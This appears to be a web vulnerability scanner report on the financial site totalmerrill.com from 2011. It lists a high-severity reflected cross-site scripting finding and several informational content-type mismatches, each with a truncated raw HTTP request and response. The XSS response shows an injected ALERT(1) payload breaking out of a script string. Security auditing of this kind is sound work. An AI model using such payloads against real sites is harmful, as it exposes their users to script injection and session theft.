1. Cross-site scripting (reflected)
3. Content type incorrectly stated
3.1. http://www.totalmerrill.com/publish/tm/images/modal_bull_bkg.gif
3.2. http://www.totalmerrill.com/publish/tm_grey/images/bull_logo.jpg
Severity: | High |
Confidence: | Certain |
Host: | http://www.totalmerrill |
Path: | /TotalMerrill/system |
GET /TotalMerrill/system Host: www.totalmerrill.com Proxy-Connection: keep-alive Referer: http://www.totalmerrill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SMIDENTITY=PIhI4cStJ |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 12407 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Wed, 29 Jun 2011 11:56:16 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <hea ...[SNIP]... <script type='text/javascript'> FAType = 'WM.A9AF9';ALERT(1)/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.totalmerrill |
Path: | /publish/tm/js/Total |
GET /publish/tm/js/Total Host: www.totalmerrill.com Proxy-Connection: keep-alive Referer: http://www.totalmerrill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SMIDENTITY=PIhI4cStJ |
HTTP/1.1 200 OK Content-Length: 239961 Content-Type: application/x-javascript Content-Location: http://www.totalmerrill Expires: Fri, 01 Jan 2016 04:00:00 GMT Last-Modified: Tue, 21 Jun 2011 19:14:21 GMT Accept-Ranges: bytes Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Wed, 29 Jun 2011 11:55:46 GMT var Prototype={Version:'1.5.1 ...[SNIP]... '/') + 1); if(sPage.toLowerCase() { var txtEmail = document.getElementById( if(txtEmail) { txtEmail.value = 'totalmerrillsupport@ml var objParent = txtEmail.parentNode if(objParent) objParent.style.display = 'none'; } } } onloadQueue.push function AddLinkedlnImage() { if(win ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.totalmerrill |
Path: | /publish/tm/images/modal |
GET /publish/tm/images/modal Host: www.totalmerrill.com Proxy-Connection: keep-alive Referer: http://www.totalmerrill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SMIDENTITY=PIhI4cStJ |
HTTP/1.1 200 OK Content-Length: 27713 Content-Type: image/gif Content-Location: http://www.totalmerrill Expires: Fri, 01 Jan 2016 04:00:00 GMT Last-Modified: Wed, 16 Sep 2009 16:20:46 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Wed, 29 Jun 2011 11:55:53 GMT ......JFIF.....H.H.... ....'.. ....'.Adobe Photoshop CS2 Windows.2009:09:16 11:11:36......... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.totalmerrill |
Path: | /publish/tm_grey/images |
GET /publish/tm_grey/images Host: www.totalmerrill.com Proxy-Connection: keep-alive Referer: http://www.totalmerrill User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TM_PUID=e45b9a76-ad58 |
HTTP/1.1 200 OK Content-Length: 3804 Content-Type: image/jpeg Content-Location: http://www.totalmerrill Last-Modified: Wed, 25 Mar 2009 19:58:05 GMT Accept-Ranges: bytes Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Wed, 29 Jun 2011 14:04:33 GMT GIF89a..(................ @\.D^.Fa.Ni'Vn,[s1_v9f|c. ...[SNIP]... |